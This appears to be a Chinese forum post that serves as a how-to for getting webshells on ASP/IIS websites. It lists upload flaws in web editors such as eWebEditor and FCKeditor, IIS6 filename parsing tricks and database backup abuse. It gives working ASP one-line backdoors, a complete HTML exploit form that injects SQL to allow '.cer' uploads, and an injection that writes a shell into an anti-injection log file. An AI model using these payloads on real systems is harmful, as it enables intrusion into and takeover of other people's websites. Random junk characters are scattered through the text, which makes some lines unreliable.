|
 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式( ~( d; f+ E1 m9 q
5 g0 @) r; w" k9 x/ k% m& a0 A2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp: p" k' m7 z. L$ L4 Q, N+ s- n: f4 _
% z) X$ y- B$ A' Z* N
3.上传漏洞:
+ i T6 j2 v1 O9 f) x2 S+ H5 C9 G* a2 S
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x007 \2 F7 @8 c* r; l C
1 x8 U$ V* ]" G. T
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件5 Q8 p" W K" B9 o: j3 S
, f# t; o, R+ }* B0 e' L雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp s9 G% ^7 h- @0 b
然后在上传文件里面填要传的图片格式的ASP木马+ n7 x2 o5 i# n9 ~0 W
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp9 G# X: {0 h4 y% v! G
4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
5 ~! D6 g* P9 @5 P, s% H, L# s6 o X6 L2 G
<html>
! v/ i. I. m# q# S9 K/ D" _' N5 k<head>- q2 \0 u9 ~9 g- Z6 v6 `
<title>ewebeditor upload.asp上传利用</title># q3 G; j+ f& r! u" e4 j: ~
</head>
/ Y0 }* k& z$ O' F4 F( i/ ]. d<body>
W: C: e& R# Q2 g- n+ i8 v<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">
2 p9 E0 Q0 R& S- p! w* J$ l<input type=file name=uploadfile size=100><br><br>8 C8 q' Z( N, r- c/ s; j9 \0 c$ Q
<input type=submit value=Fuck>
8 `0 r2 ` m: D4 p</form>
4 d7 W. K) \5 W4 ~% M4 i</body>% F9 N! P1 Q$ T; |' _" n3 D+ l) y
</form>
( N. r/ G( C7 s* L3 i6 A7 m</html>; ?7 J. ~8 y/ H3 i' c
0 E9 j/ s* L1 O4 o5 q$ J2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
8 {5 f# j- L2 `+ h6 T# d5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
2 z% H/ T! h* |* F0 z( s- c5 g& }7 V, Z
利用windows2003解析。建立zjq.asp的文件夹
! n8 j9 I) L+ G k, ^) X$ l$ Q1 f
* p$ x/ K. I& b+ y- F: `6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
* d1 J& ]; a2 _' J U6 J5 T0 [6 f
7.cuteeditor:类似ewebeditor
8 V9 U2 z4 S2 W( O2 c Z% {% j4 n/ P, N( l9 U; E" ^. l
8.htmleditor:同上
' a4 T1 P1 h) B& i3 h% K# Z( u' _& A" P* c/ B
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
- S7 O& Z4 ]' q6 v. }& X3 S
+ y( d+ g& J% [5 p+ m<%execute request("value")%><%'<% loop <%:%>3 ?! q- m$ O7 G8 W
/ ?/ ^) u% w( q) }2 `/ f<%'<% loop <%:%><%execute request("value")%>5 L7 @) Y) }- y6 @" W6 v1 G1 s7 E, G
4 P+ X* G" S: r: |<%execute request("value")'<% loop <%:%>; @/ V2 t* C* i& C4 O
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞4 C: p& S2 t2 t5 R8 P: [- ~
1 k1 l k' w) G+ d% F1 T0 f3 o- j10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞- X* q( {' j' \, m
+ Q+ z0 |. L1 x5 q A$ c
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
' j6 Z& i- S( b- H- Q, ?# `8 _$ s, M& l& v) l2 |5 o
解析漏洞得到webshell
4 A/ `, ?$ C) U( K
! s" R, f" e& L! ~' H12.mssql差异备份,日志备份,前提需知道web路径
( U. b) c: j) o+ a7 H x# ?) T' l: P; E' ^3 b" S
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell) z) ~# b. D1 g- L1 r
Y& _. G5 M9 u" ]/ E3 T14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell: d. Z2 u" _4 m0 I
1 o _& b) [1 w5 C
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可
- B% ~* |) V E3 M% B
5 M3 _. x) k6 v3 q! e以上只是本人的一些拙见,并不完善,以后想到了再继续添加7 `7 A8 Z% k5 t- C
不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|